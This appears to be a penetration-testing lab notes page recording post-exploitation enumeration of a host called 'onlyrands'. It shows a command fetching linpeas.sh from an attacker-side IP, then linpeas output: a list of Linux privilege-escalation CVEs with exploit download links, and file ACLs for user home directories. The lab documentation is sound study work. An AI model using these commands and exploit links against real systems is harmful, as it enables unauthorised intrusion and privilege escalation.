PEAS

Conducting an automated enumeration after performing a manual enumeration

git@onlyrands:/var/tmp$ wget -q http://192.168.45.197/linpeas.sh ; chmod 755 ./linpeas.sh

Delivery complete

Executing PEAS

CVEs

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

Network

Installed Programs

Nginx

Tomcat

SSH

ACL

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls
# file: /home//administration/edgarm
USER   edgarm          rwx  rwx
user   sonjas          rwx  rwx
GROUP  administration  ---  ---
mask                   rwx  rwx
other                  ---  ---
 
# file: /home//administration/briand
USER   briand          rwx  rwx
user   sonjas          rwx  rwx
GROUP  administration  ---  ---
mask                   rwx  rwx
other                  ---  ---
 
# file: /home//finance
USER   root      rwx  rwx
user   edgarm    r-x  r-x
user   sonjas    rwx  rwx
GROUP  root      r-x  r-x
mask             rwx  rwx
other            r-x  r-x
 
# file: /home//finance/dont
USER   dont      rwx  rwx
user   edgarm    r-x  r-x
user   sonjas    rwx  rwx
GROUP  finance   ---  ---
mask             rwx  rwx
other            ---  ---
 
# file: /home//finance/juliuso
USER   juliuso   rwx  rwx
user   edgarm    r-x  r-x
user   sonjas    rwx  rwx
GROUP  finance   ---  ---
mask             rwx  rwx
other            ---  ---
 
# file: /home//finance/renep
USER   renep     rwx  rwx
user   edgarm    r-x  r-x
user   sonjas    rwx  rwx
GROUP  finance   ---  ---
mask             rwx  rwx
other            ---  ---
 
# file: /home//operations
USER   root      rwx  rwx
user   sonjas    rwx  rwx
user   briand    r-x  r-x
GROUP  root      r-x  r-x
mask             rwx  rwx
other            r-x  r-x
 
# file: /home//operations/bobbyp
USER   bobbyp      rwx  rwx
user   sonjas      rwx  rwx
user   briand      r-x  r-x
GROUP  operations  ---  ---
mask               rwx  rwx
other              ---  ---
 
# file: /home//operations/susanw
USER   susanw      rwx  rwx
user   sonjas      rwx  rwx
user   briand      r-x  r-x
GROUP  operations  ---  ---
mask               rwx  rwx
other              ---  ---

InfoSec LAB

Explorer

Scrutiny_Automated

PEAS

CVEs

Network

Installed Programs

Nginx

Tomcat

SSH

ACL

Mail

Interesting Files / Directories

Interactive Graph View

Table of Contents

Backlinks